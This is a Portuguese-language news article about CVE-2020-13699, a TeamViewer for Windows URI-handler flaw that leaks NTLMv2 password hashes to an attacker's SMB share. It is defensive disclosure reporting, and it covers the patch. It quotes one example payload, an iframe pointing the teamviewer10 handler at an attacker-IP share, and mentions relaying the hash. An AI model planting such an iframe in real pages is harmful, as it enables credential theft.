Falha No TeamViewer Pode Permitir Que Hackers Roubem Senha Do Sistema

O TeamViewer recentemente corrigiu uma vulnerabilidade de alto risco em seu aplicativo desktop para Windows ao lançar uma nova versão de seu software, que, se explorada, poderia permitir que atacantes remotos roubassem sua senha do sistema e potencialmente a explorassem.

O que é mais preocupante é que este ataque não requer a interação da vítima e pode ser realizado quase automaticamente.

Para quem não sabe, o TeamViewer é um aplicativo de software popular desenvolvido pela empresa alemã TeamViewer GmbH, para controle remoto, compartilhamento de desktop, reuniões online, conferências na web e transferência de arquivos entre computadores.

Está disponível para os sistemas operacionais Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 e BlackBerry. Também é possível acessar um sistema que executa o TeamViewer com um navegador da web.

A grave vulnerabilidade chamada CVE-2020-13699 foi descoberta pela primeira vez por Jeffrey Hofmann, um pesquisador de segurança da Praetorian. De acordo com o pesquisador, a vulnerabilidade reside no TeamViewer para Windows na forma como o aplicativo cita seu URI personalizado (Unquoted URI handler).

O especialista descobriu que o problema poderia permitir que um atacante forçasse o software a retransmitir uma solicitação de autenticação NTLM para o sistema do atacante. Em outras palavras, um atacante pode forçar o esquema URI do TeamViewer a partir de uma página da web para enganar o aplicativo instalado no sistema da vítima a iniciar uma conexão com o compartilhamento SMB remoto de propriedade do atacante.

Isso aciona o processo de autenticação SMB, que, por sua vez, vazará o nome de usuário do sistema e a versão hash NTLMv2 da senha para os atacantes.

Para explorar com sucesso a CVE 2020-13699, o atacante precisa incorporar um iframe malicioso em um site e, em seguida, enganar as vítimas para visitar essa URL maliciosamente elaborada. Assim que as vítimas clicarem no link, o TeamViewer lançará automaticamente seu cliente desktop para Windows e abrirá um compartilhamento SMB remoto.

“Um atacante poderia incorporar um iframe malicioso em um site com uma URL elaborada (iframe src=’teamviewer10: –play \attacker-IPileake.tvs’) que lançaria o cliente desktop do TeamViewer para Windows e forçaria a abrir um compartilhamento SMB remoto,” explicou Jeffrey Hofmann em um aviso.

“O Windows realizará a autenticação NTLM ao abrir o compartilhamento SMB e essa solicitação pode ser retransmitida (usando uma ferramenta como responder) para execução de código (ou capturada para quebra de hash).”

Essa vulnerabilidade afeta “manipuladores de URI teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 e tvvpn1,” disse Hofmann.

Após a divulgação da vulnerabilidade, o projeto TeamViewer corrigiu a falha citando os parâmetros passados pelos manipuladores de URI afetados, por exemplo, URL:teamviewer10 Protocolo “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.

Para corrigir a falha, “Implementamos algumas melhorias no manuseio de URI relacionadas à CVE 2020-13699,” disse o TeamViewer em um comunicado. “Obrigado, Jeffrey Hofmann da Praetorian, por seu profissionalismo e por seguir um modelo de divulgação responsável. Agradecemos por você ter entrado em contato conosco e por ter confirmado a correção de suas descobertas na última versão.”

Para resolver o problema, o TeamViewer lançou a versão 15.8.3 e recomenda que seus usuários atualizem imediatamente para esta versão.

Também Leia - Melhores alternativas ao Teamviewer